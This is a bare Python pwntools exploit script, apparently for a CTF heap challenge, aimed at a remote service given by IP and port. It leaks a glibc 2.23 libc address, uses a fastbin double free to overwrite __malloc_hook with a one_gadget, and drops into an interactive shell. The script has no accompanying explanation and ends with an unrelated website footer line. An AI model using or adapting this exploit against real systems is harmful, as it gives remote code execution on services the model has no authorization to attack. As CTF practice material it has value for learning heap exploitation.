from pwn import *
from LibcSearcher import *
def conn():
global r,Libc,elf
#r = process("./pwn112")
Libc = ELF("./libc-2.23.so")
r = remote("1.95.36.136", 2072)
#elf = ELF("./pwn1")
def add(x,y):
r.sendlineafter(b"choice:\n",b"1")
r.sendlineafter(b"index:\n",str(x).encode())
r.sendlineafter(b"size:\n",str(y).encode())
def edit(x,y):
r.sendlineafter(b"choice:\n",b"3")
r.sendlineafter(b"index:\n",str(x).encode())
r.sendlineafter(b"length:\n",str(len(y)).encode())
r.sendlineafter(b"content:\n",y)
def free(x):
r.sendlineafter(b"choice:\n",b"2")
r.sendlineafter(b"index:\n",str(x).encode())
def show(x):
r.sendlineafter(b"choice:\n",b"4")
r.sendlineafter(b"index:\n",str(x).encode())
def pwn():
add(0,0x410)
add(1,0x10)
free(0)
add(0,0x410)
show(0)
libc = u64(r.recvline()[:-1].ljust(8,b"\x00"))-0x3c4b78
print("libc>>>",hex(libc))
one = [0x4527a,0xf03a4,0xf1247]
onegadget = libc + one[1]
add(0,0x68)
add(1,0x68)
free(0)
free(1)
free(0)
add(0,0x68)
malloc = libc+Libc.symbols["__malloc_hook"]
print("maloc>>>",hex(malloc))
edit(0,p64(malloc-0x23))
add(0,0x68)
add(0,0x68)
add(0,0x68)
edit(0,b'a'*0x13+p64(onegadget))
add(0,0x10)
#gdb.attach(r)
r.interactive()
conn()
pwn()
浙公网安备 33010602011771号